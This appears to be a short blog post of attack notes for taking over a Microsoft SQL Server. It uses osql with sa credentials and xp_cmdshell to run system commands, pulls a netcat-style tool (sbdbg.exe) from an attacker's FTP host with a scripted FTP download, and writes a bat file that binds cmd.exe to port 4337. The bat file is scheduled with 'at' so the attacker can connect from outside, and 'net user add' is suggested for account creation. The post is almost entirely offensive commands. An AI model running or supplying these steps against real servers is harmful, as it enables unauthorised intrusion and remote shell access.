osql -Daaa -Usa -Psupersecret -Q "[valid sql statement]"
{SQL template}
osql -Daaa -Usa -Psupersecret -Q "exec xp_cmdshell '[valid shell commands]'"
Pull data back to SQL:
c:\windows\system32\tftp.exe
c:\windows\system32\ftp.exe
Or be obvious:
net user add
On semi-evil box hoster: (Serve TFTP or FTP)
sbdbg.exe
{SQL template} set up FTP command script:
ECHO GET sbdbg > script.ftp
ECHO QUIT >> script.ftp
ECHO QUIT >> script.ftp
{SQL template} Execute FTP script:
FTP -s:script.ftp -A semi.evil.host.ip
{SQL template} setup reverse shell:
echo sbdbg.exe -l -p 4337 -e cmd.exe > evil.bat
{SQL template} get time on server:
Dont forget ICMP timestamp requests instead..
time
{SQL template} schedule execution of bat file
at \\sql.vuln.box\ 04:20 evil.bat
connect from any.evil.ip
sbd sql.vuln.box 4337
Posts
No comments:
Post a Comment